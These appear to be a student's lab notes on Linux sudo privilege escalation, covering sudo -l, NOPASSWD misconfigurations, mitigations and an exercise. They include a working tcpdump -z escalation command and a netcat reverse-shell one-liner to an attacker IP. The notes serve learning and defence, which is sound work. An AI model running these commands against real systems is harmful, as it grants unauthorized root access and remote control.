# Intro - Sudo privs can be granted to an account, permitting the account to run certain commands in the context of the root (or another account) without having to change users or grant excessive privileges - When the `sudo` command is issued, the system will check if the user issuing the command has the appropriate rights, as configured in `/etc/sudoers` - When landing on a box, we should always check to see if the current user has any `sudo` privs by issuing the `sudo -l` - Sometimes we will need to know the user's password to list their `sudo` rights - NOTE: however, any rights entries with the `NOPASSWD` option can be seen without entering a password ![[images/Pasted image 20260203202032.png]] - It is easy to misconfigure `sudo` privs - For example, a user may be granted root-level permissions without requiring a password - Or the permitted command line might be specified too loosely, allowing us to run a program in an unintended way, resulting in privilege escalation # Example Exploit of `tcpdump` - As an example, if `/etc/sudoers` is edited to grant a user the right to run a command such as `tcpdump` per the following entry in the sudoers file: `(ALL) NOPASSWD: /usr/sbin/tcpdump` an attacker could leverage this to take advantage of a the postrotate-commandoption ```bash man tcpdump <SNIP> -z postrotate-command Used in conjunction with the -C or -G options, this will make `tcpdump` run " postrotate-command file " where the file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2. ``` - By specifying the `-z` flag, an attacker could use `tcpdump` to execute a shell script, gain a reverse shell as the root user or run other privileged commands - For example, an attacker could create the shell script `.test` containing a reverse shell and execute it as below: ```bash sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root ``` - But, to execute this exploit, we must first make a file to execute with the `postrotate-command`, adding a simple reverse shell one-line ```bash cat /tmp/.test rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f ``` # Mitigations - [AppArmor](https://wiki.ubuntu.com/AppArmor) in more recent distributions has predefined the commands used with the `postrotate-command`, effectively preventing command execution. Two best practices that should always be considered when provisioning `sudo` rights: 1. Always specify the absolute path to any binaries listed in the `sudoers` file entry. Otherwise, an attacker may be able to leverage PATH abuse (which we will see in the next section) to create a malicious binary that will be executed when the command runs (i.e., if the `sudoers` entry specifies `cat` instead of `/bin/cat` this could likely be abused).| 2. Grant `sudo` rights sparingly and based on the principle of least privilege. Does the user need full `sudo` rights? Can they still perform their job with one or two entries in the `sudoers` file? Limiting the privileged command that a user can run will greatly reduce the likelihood of successful privilege escalation.| --- # Exercise - `ping` test ![[images/Pasted image 20260203202639.png]] - `ssh` into box with given creds - run `sudo -l` ![[images/Pasted image 20260203202633.png]]